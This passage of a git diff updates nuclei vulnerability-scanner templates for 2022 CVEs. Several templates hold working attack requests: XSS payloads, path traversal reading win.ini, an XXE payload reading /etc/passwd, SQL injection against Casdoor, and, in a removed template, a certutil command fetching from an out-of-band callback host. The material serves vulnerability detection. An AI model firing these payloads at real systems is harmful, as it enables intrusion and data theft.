b/nuclei-templates/CVE-2022/CVE-2022-23348.yaml index 6eee2fa3a0..9e7bd3de0f 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-23348.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-23348.yaml @@ -6,21 +6,31 @@ info: severity: medium description: | BigAnt Server 5.6.06 is susceptible to improper access control. The software utililizes weak password hashes. An attacker can craft a password hash and thereby possibly possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the access control issue. reference: - https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23348 - http://bigant.com - https://nvd.nist.gov/vuln/detail/CVE-2022-23348 + - https://www.bigantsoft.com/ + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-23348 cwe-id: CWE-916 + epss-score: 0.00425 + epss-percentile: 0.71717 + cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: bigantsoft + product: bigant_server shodan-query: http.html:"bigant" - verified: "true" - tags: cve,cve2022,bigant,unauth,exposure + tags: cve,cve2022,bigant,unauth,exposure,bigantsoft -requests: +http: - method: GET path: - "{{BaseURL}}/Runtime/Data/ms_admin.php" @@ -43,5 +53,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/03 +# digest: 4b0a00483046022100cc5a1e9ab10a42df26c83f3bba3e5577c2c8cfe4b97d834eba3461a9745d8f2d022100c9eba2a9ce77b634e7a4f2af4a07997e509bbc86520f70968b5457b7f55aa102:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-23544.yaml b/nuclei-templates/CVE-2022/CVE-2022-23544.yaml index 20bc5f1274..f24c78cefe 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-23544.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-23544.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery that leads to Cross-Site Scripting. A Server-Side request forgery in `IssueProxyResourceService::getMdImageByUrl` allows an attacker to access internal resources, as well as executing JavaScript code in the context of Metersphere's origin by a victim of a reflected XSS. This vulnerability has been fixed in v2.5.0. There are no known workarounds. + impact: | + An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade MeterSphere to version 2.5.0 or later to mitigate the SSRF vulnerability. reference: @@ -17,9 +19,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-23544 - cwe-id: CWE-79,CWE-918 - epss-score: 0.00059 - epss-percentile: 0.23236 + cwe-id: CWE-918,CWE-79 + epss-score: 0.00083 + epss-percentile: 0.34435 cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -28,7 +30,7 @@ info: product: metersphere shodan-query: html:"metersphere" fofa-query: title="MeterSphere" - tags: cve,cve2022,metersphere,ssrf,oast + tags: cve2022,cve,metersphere,ssrf,oast,xss http: - method: GET @@ -50,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bb923b2cef39dd9a412348743653997bbede51b8c74d8907e12085c7fd49c739022078ef50eb5602b883f8b01f2e13840d40f566dcb430142e65c7423a438d53a3d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202c5b2eb5590a975c3168c5bf10ecafe306c4717f4461655b26d62aef269d5f3602207433e872a215f20e193af9adca4050f730dde0a9a36d95ba76a624d43780047a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2373.yaml b/nuclei-templates/CVE-2022/CVE-2022-2373.yaml index 7b32cc054a..1da0b22d07 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2373.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2373.yaml @@ -1,42 +1,56 @@ id: CVE-2022-2373 info: - name: Simply Schedule Appointments < 1.5.7.7 - Email Address Disclosure + name: WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure author: theamanrawat,theabhinavgaur severity: medium description: | - The Simply Schedule Appointments WordPress plugin before 1.5.7.7 is missing authorisation in a REST endpoint, allowing unauthenticated users to retrieve WordPress users details such as name and email address. + WordPress Simply Schedule Appointments plugin before 1.5.7.7 is susceptible to information disclosure. The plugin is missing authorization in a REST endpoint, which can allow an attacker to retrieve user details such as name and email address. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the target system. + remediation: | + Update to the latest version of the Simply Schedule Appointments plugin (1.5.7.7 or higher) to fix the information disclosure vulnerability. reference: - https://wpscan.com/vulnerability/6aa9aa0d-b447-4584-a07e-b8a0d1b83a31 - https://wordpress.org/plugins/simply-schedule-appointments/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2373 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-2373 cwe-id: CWE-862 + epss-score: 0.00292 + epss-percentile: 0.68538 + cpe: cpe:2.3:a:nsqua:simply_schedule_appointments:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: simply-schedule-appointments,unauth,wpscan,cve,cve2022,wordpress,wp-plugin,wp + verified: true + max-request: 1 + vendor: nsqua + product: simply_schedule_appointments + framework: wordpress + tags: cve,cve2022,simply-schedule-appointments,unauth,wpscan,wordpress,wp-plugin,wp,nsqua -requests: +http: - method: GET path: - "{{BaseURL}}/wp-json/ssa/v1/users" matchers-condition: and matchers: + - type: word + part: header + words: + - application/json + - type: regex regex: - 'response_code":200' - '"email":"([a-zA-Z-_0-9@.]+)","display_name":"([a-zA-Z-_0-9@.]+)","gravatar_url":"http?:\\\/\\\/([a-z0-9A-Z.\\\/?=&@_-]+)"' condition: and - - type: word - part: header - words: - - application/json - - type: status status: - 200 +# digest: 4a0a00473045022100b940545db7a1a8e51cb87f781d4b9f7ff7bdb733dc9e3e9655204af3837f5bba02200e130cc811f3149c5dadcd9d423811fc7ad8ca0528144218ddec9b6af10fc4af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2376.yaml b/nuclei-templates/CVE-2022/CVE-2022-2376.yaml index a06ad6605c..4ae33db0af 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2376.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2376.yaml @@ -1,23 +1,35 @@ id: CVE-2022-2376 info: - name: Directorist < 7.3.1 - Unauthenticated Email Address Disclosure + name: WordPress Directorist <7.3.1 - Information Disclosure author: Random-Robbie severity: medium - description: The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and any authenticated users + description: WordPress Directorist plugin before 7.3.1 is susceptible to information disclosure. The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and authenticated users. + impact: | + An attacker can gain sensitive information about the WordPress installation, potentially leading to further attacks. + remediation: Fixed in version 7.3.1. reference: - https://wpscan.com/vulnerability/437c4330-376a-4392-86c6-c4c7ed9583ad - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2376 - https://nvd.nist.gov/vuln/detail/CVE-2022-2376 - remediation: Fixed in version 7.3.1 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-2376 cwe-id: CWE-862 - tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,directorist,unauth,disclosure + epss-score: 0.04177 + epss-percentile: 0.92016 + cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: wpwax + product: directorist + framework: wordpress + tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,directorist,unauth,disclosure,wpwax -requests: +http: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination' @@ -39,3 +51,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100cb70d03524416c4cc1af8cff5314a511b64abcf5e9026d7dbdb016fba5ddeda0022021c8dcef9f3fad8ea0d0eb19aa59daf7ce4f6d281296bc4b869f297db54aab20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2379.yaml b/nuclei-templates/CVE-2022/CVE-2022-2379.yaml index 096d9efc33..61238c3033 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2379.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2379.yaml @@ -1,11 +1,15 @@ id: CVE-2022-2379 info: - name: Easy Student Results <= 2.2.8 - Information Disclosure + name: WordPress Easy Student Results <=2.2.8 - Improper Authorization author: theamanrawat severity: high description: | - The Easy Student Results WordPress plugin through 2.2.8 lacks authorisation in its REST API, allowing unauthenticated users to retrieve information related to the courses, exams, departments as well as student's grades and PII such as email address, physical address, phone number etc. + WordPress Easy Student Results plugin through 2.2.8 is susceptible to information disclosure. The plugin lacks authorization in its REST API, which can allow an attacker to retrieve sensitive information related to courses, exams, and departments, as well as student grades and information such as email address, physical address, and phone number. + impact: | + An attacker can gain access to sensitive student information, potentially compromising their privacy and security. + remediation: | + Update to the latest version of the WordPress Easy Student Results plugin (2.2.8) to fix the improper authorization vulnerability. reference: - https://wpscan.com/vulnerability/0773ba24-212e-41d5-9ae0-1416ea2c9db6 - https://wordpress.org/plugins/easy-student-results/ @@ -15,22 +19,28 @@ info: cvss-score: 7.5 cve-id: CVE-2022-2379 cwe-id: CWE-862 + epss-score: 0.01934 + epss-percentile: 0.87376 + cpe: cpe:2.3:a:easy_student_results_project:easy_student_results:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wordpress,wp-plugin,wp,easy-student-results,disclosure,wpscan,cve,cve2022 + verified: true + max-request: 2 + vendor: easy_student_results_project + product: easy_student_results + framework: wordpress + tags: cve,cve2022,wordpress,wp-plugin,wp,easy-student-results,disclosure,wpscan,easy_student_results_project -requests: +http: - raw: - | GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1 Host: {{Hostname}} - - | GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1 Host: {{Hostname}} stop-at-first-match: true - req-condition: true + matchers-condition: and matchers: - type: word @@ -56,3 +66,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100e1f2b124c765614d3ab35ff74edf5bbb68b70131be4b3b60a91c089395bc21a802200331ef6a4224f062eb1af5715667a63cb2fbc4407cd604a4a3dc649f383eef79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-23808.yaml b/nuclei-templates/CVE-2022/CVE-2022-23808.yaml deleted file mode 100644 index b174bac40d..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-23808.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2022-23808 - -info: - name: phpMyAdmin < 5.1.2 - Cross-Site Scripting - author: cckuailong,daffainfo - severity: medium - description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection. - reference: - - https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A - - https://github.com/dipakpanchal456/CVE-2022-23808 - - https://nvd.nist.gov/vuln/detail/CVE-2022-23808 - - https://www.phpmyadmin.net/security/PMASA-2022-2/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-23808 - cwe-id: CWE-79 - metadata: - verified: true - shodan-query: http.component:"phpmyadmin" - tags: cve,cve2022,phpmyadmin,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - "{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - stop-at-first-match: true - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "\">" - - "

Add a new server

" - - "phpMyAdmin setup" - condition: and - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 -# Enhanced by mp on 2022/03/08 diff --git a/nuclei-templates/CVE-2022/CVE-2022-2383.yaml b/nuclei-templates/CVE-2022/CVE-2022-2383.yaml index 121112e33d..57f57cb54d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2383.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2383.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | WordPress Feed Them Social plugin before 3.0.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back in the page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Update to the latest version of the Feed Them Social plugin (3.0.1 or higher) to mitigate the XSS vulnerability. reference: - https://wpscan.com/vulnerability/4a3b3023-e740-411c-a77c-6477b80d7531 - https://wordpress.org/plugins/feed-them-social/ @@ -15,11 +19,33 @@ info: cvss-score: 6.1 cve-id: CVE-2022-2383 cwe-id: CWE-79 + epss-score: 0.00119 + epss-percentile: 0.45893 + cpe: cpe:2.3:a:slickremix:feed_them_social:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wp,wordpress,wp-plugin,wpscan,cve,cve2022,xss + verified: true + max-request: 1 + vendor: slickremix + product: feed_them_social + framework: wordpress + tags: cve,cve2022,wp,wordpress,wp-plugin,wpscan,xss,slickremix + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /wp-content/plugins/feed-them-social/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Feed Them Social' + - 'Tags:' + condition: and -requests: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E' @@ -39,5 +65,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 490a00463044022007c261c3ec560f291c2c68c92b556242e52fb67a3f9daa340a1f02f9b9b3091802204fccfa62735961d779929f897049f006dae4f29bcf27a5e66c59bc53889f2607:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-23854.yaml b/nuclei-templates/CVE-2022/CVE-2022-23854.yaml index 431dfc7406..f85f68fd1d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-23854.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-23854.yaml @@ -6,6 +6,10 @@ info: severity: high description: | AVEVA InTouch Access Anywhere Secure Gateway is vulnerable to local file inclusion. + impact: | + An attacker can access sensitive information stored on the server, potentially leading to further exploitation or unauthorized access. + remediation: | + Apply the latest security patches or updates provided by AVEVA to fix the local file inclusion vulnerability. reference: - https://packetstormsecurity.com/files/cve/CVE-2022-23854 - https://www.aveva.com @@ -16,13 +20,19 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-23854 - cwe-id: CWE-23 + cwe-id: CWE-22,CWE-23 + epss-score: 0.66314 + epss-percentile: 0.97841 + cpe: cpe:2.3:a:aveva:intouch_access_anywhere:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: aveva + product: intouch_access_anywhere shodan-query: http.html:"InTouch Access Anywhere" - verified: "true" - tags: lfi,packetstorm,cve,cve2022,aveva,intouch + tags: cve,cve2022,lfi,packetstorm,aveva,intouch -requests: +http: - method: GET path: - "{{BaseURL}}/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini" @@ -30,6 +40,7 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - 'for 16-bit app support' - 'extensions' @@ -38,10 +49,11 @@ requests: - type: word part: header words: - - EricomSecureGateway + - 'text/ini' + - 'application/octet-stream' + condition: or - type: status status: - 200 - -# Enhanced by mp on 2023/01/15 +# digest: 490a0046304402203ba9de7758c76694c9619b5b90dc1c5aad849e1e881d89f2fcb805ccd73226cf0220771816d83704155d2db5ac2473fcafb8e0175c8d3897d0457d88af07cbf5500e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-23881.yaml b/nuclei-templates/CVE-2022/CVE-2022-23881.yaml deleted file mode 100644 index 84b802eba2..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-23881.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2022-23881 - -info: - name: zzzphp v2.1.0 RCE - author: pikpikcu - severity: critical - description: ZZZCMS zzzphp v2.1.0 was discovered to contain a remote command execution (RCE) vulnerability via danger_key() at zzz_template.php. - reference: - - https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md - - http://www.zzzcms.com - - https://nvd.nist.gov/vuln/detail/CVE-2022-23881 - tags: cve,cve2022,rce,zzzphp,zzzcms - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2022-23881 - cwe-id: CWE-77 - -requests: - - raw: - - | - GET /?location=search HTTP/1.1 - Host: {{Hostname}} - Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: status - status: - - 500 diff --git a/nuclei-templates/CVE-2022/CVE-2022-23898.yaml b/nuclei-templates/CVE-2022/CVE-2022-23898.yaml index 5b537970c0..23123219c9 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-23898.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-23898.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | MCMS 5.2.5 contains a SQL injection vulnerability via the categoryId parameter in the file IContentDao.xml. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in MCMS 5.2.5. reference: @@ -17,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-23898 cwe-id: CWE-89 - epss-score: 0.02852 - epss-percentile: 0.8963 + epss-score: 0.0161 + epss-percentile: 0.87161 cpe: cpe:2.3:a:mingsoft:mcms:5.2.5:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: product: mcms shodan-query: http.favicon.hash:1464851260 fofa-query: icon_hash="1464851260" - tags: cve,cve2022,sqli,mcms + tags: cve,cve2022,sqli,mcms,mingsoft variables: num: "999999999" @@ -45,4 +47,4 @@ http: part: body words: - 'c8c605999f3d8352d7bb792cf3fdb25' -# digest: 4a0a004730450221009461fb4908d89a3a30716a3869ba45ec3b77c43067bfefaeca087929a6bd7cac02206c6d9453891af80f199dc5e623b40a6798b1df14ef21de003bcc388566749d26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc573519d97c7e33cb54d6edce45a40fcdb95812ec7800e929a9205d5685fc690221008936ca5aa6d12794cfd449ed310894bcd2cc70e038d631c3e29d6f0157b4b92e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-23944.yaml b/nuclei-templates/CVE-2022/CVE-2022-23944.yaml index 8fce813a89..830928fc23 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-23944.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-23944.yaml @@ -3,19 +3,32 @@ id: CVE-2022-23944 info: name: Apache ShenYu Admin Unauth Access author: cckuakilong - severity: medium - description: "Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1." + severity: critical + description: Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Apache ShenYu admin panel. remediation: Upgrade to Apache ShenYu (incubating) 2.4.2 or apply the appropriate patch. reference: - https://github.com/apache/incubator-shenyu/pull/2462 - https://nvd.nist.gov/vuln/detail/CVE-2022-23944 - https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md + - https://lists.apache.org/thread/dbrjnnlrf80dr0f92k5r2ysfvf1kr67y + - http://www.openwall.com/lists/oss-security/2022/01/25/15 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 cve-id: CVE-2022-23944 - cwe-id: CWE-862 + cwe-id: CWE-306,CWE-862 + epss-score: 0.45887 + epss-percentile: 0.97086 + cpe: cpe:2.3:a:apache:shenyu:2.4.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: apache + product: shenyu tags: cve,cve2022,shenyu,unauth,apache -requests: +http: - method: GET path: - "{{BaseURL}}/plugin" @@ -32,5 +45,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/08 +# digest: 490a0046304402207d4b54505896da78a61426b82a09c16b3004ec88eaafb319e9154fc6619cf00b0220133dc543f97181df2601ebbfe17254135ff340b3160efb33fad2e75fc4b49dc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24124.yaml b/nuclei-templates/CVE-2022/CVE-2022-24124.yaml new file mode 100644 index 0000000000..dfd0bce904 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-24124.yaml @@ -0,0 +1,50 @@ +id: CVE-2022-24124 + +info: + name: Casdoor 1.13.0 - Unauthenticated SQL Injection + author: cckuailong + severity: high + description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. + remediation: | + Upgrade to a patched version of Casdoor or apply the necessary security patches to mitigate the SQL injection vulnerability. + reference: + - https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html + - https://www.exploit-db.com/exploits/50792 + - https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget + - https://nvd.nist.gov/vuln/detail/CVE-2022-24124 + - https://github.com/casdoor/casdoor/compare/v1.13.0...v1.13.1 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-24124 + cwe-id: CWE-89 + epss-score: 0.07543 + epss-percentile: 0.93981 + cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: casbin + product: "casdoor" + shodan-query: http.title:"Casdoor" + tags: cve,cve2022,sqli,unauth,packetstorm,edb,casdoor,casbin + +http: + - method: GET + path: + - "{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "XPATH syntax error.*'" + - "casdoor" + condition: and + + - type: status + status: + - 200 +# digest: 4b0a00483046022100ba5ebd65a068d08aa8a9fb4c512f59baa665b2cbe8fa4e25a66a92104f27f415022100d66fba2ed1e2304f9c437470604cb22840501aada5cd30a98bf5d9811b2b07e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24129.yaml b/nuclei-templates/CVE-2022/CVE-2022-24129.yaml index ae129fe8d2..073b046241 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24129.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24129.yaml @@ -1,49 +1,31 @@ id: CVE-2022-24129 - info: - name: Shibboleth OIDC OP <3.0.4 - Server-Side Request Forgery + name: Shibboleth OIDC OP plugin <3.0.4 - Server-Side Request Forgery author: 0x_Akoko severity: high - description: The Shibboleth Identity Provider OIDC OP plugin before 3.0.4 is vulnerable to server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter, which allows attackers to interact with arbitrary third-party HTTP services. - impact: | - An attacker can exploit this vulnerability to send crafted requests, potentially leading to unauthorized access to internal resources or information disclosure. - remediation: | - Upgrade to Shibboleth OIDC OP version 3.0.4 or later to mitigate the vulnerability. + description: The OIDC OP plugin before 3.0.4 for Shibboleth Identity Provider allows server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter. This allows attackers to interact with arbitrary third-party HTTP services. reference: - https://github.com/sbaresearch/advisories/tree/public/2022/SBA-ADV-20220127-01_Shibboleth_IdP_OIDC_OP_Plugin_SSRF - https://shibboleth.atlassian.net/wiki/spaces/IDPPLUGINS/pages/1376878976/OIDC+OP - - http://shibboleth.net/community/advisories/ - https://nvd.nist.gov/vuln/detail/CVE-2022-24129 - - http://shibboleth.net/community/advisories/secadv_20220131.txt + - http://shibboleth.net/community/advisories/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N cvss-score: 8.2 cve-id: CVE-2022-24129 cwe-id: CWE-918 - epss-score: 0.00647 - epss-percentile: 0.77074 - cpe: cpe:2.3:a:shibboleth:oidc_op:*:*:*:*:*:identity_provider:*:* - metadata: - max-request: 1 - vendor: shibboleth - product: oidc_op - framework: identity_provider - tags: cve,cve2022,ssrf,oidc,shibboleth,identity_provider - -http: + tags: cve,cve2022,ssrf,oidc,shibboleth +requests: - method: GET path: - '{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}' - matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - type: word part: interactsh_request words: - "ShibbolethIdp" -# digest: 4a0a004730450221008f7628cf3482df6bb5f6dc923c39a4fd651c4428bbb09c0f117f6b32b15940e402206af2dfa7231ae6a440e9440cc05d63f828a884006f109b865c5046f61b0b8cb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2414.yaml b/nuclei-templates/CVE-2022/CVE-2022-2414.yaml new file mode 100644 index 0000000000..0f72b8b9b3 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-2414.yaml @@ -0,0 +1,68 @@ +id: CVE-2022-2414 + +info: + name: FreeIPA - XML Entity Injection + author: DhiyaneshDk + severity: high + description: | + Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the server. + remediation: | + Apply the latest security patches and updates provided by the vendor to fix the XML Entity Injection vulnerability in FreeIPA. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/Dogtag/Dogtag%20PKI%20XML%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CVE-2022-2414.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-2414 + - https://github.com/dogtagpki/pki/pull/4021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-2414 + cwe-id: CWE-611 + epss-score: 0.01256 + epss-percentile: 0.84092 + cpe: cpe:2.3:a:dogtagpki:dogtagpki:10.5.18:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: dogtagpki + product: dogtagpki + shodan-query: title:"Identity Management" html:"FreeIPA" + fofa-query: title="Identity Management" + tags: cve,cve2022,dogtag,freeipa,xxe,dogtagpki + +http: + - raw: + - | + POST /ca/rest/certrequests HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/xml + + <!--?xml version="1.0" ?--> + <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]> + <CertEnrollmentRequest> + <Attributes/> + <ProfileID>&ent;</ProfileID> + </CertEnrollmentRequest> + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: body + words: + - "PKIException" + + - type: word + part: header + words: + - "application/xml" + + - type: status + status: + - 400 +# digest: 490a0046304402203e01a48643ddc4111a52d8b34ca90c1d803678990761a21ea7e52dbdcf384f87022053892bd3048fc94077b0f1d151dfade945c5ee5c9fa857c5d0203eca2a47d1cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24181.yaml b/nuclei-templates/CVE-2022/CVE-2022-24181.yaml index e4d4fbe5a6..706599f0a0 100644 --- 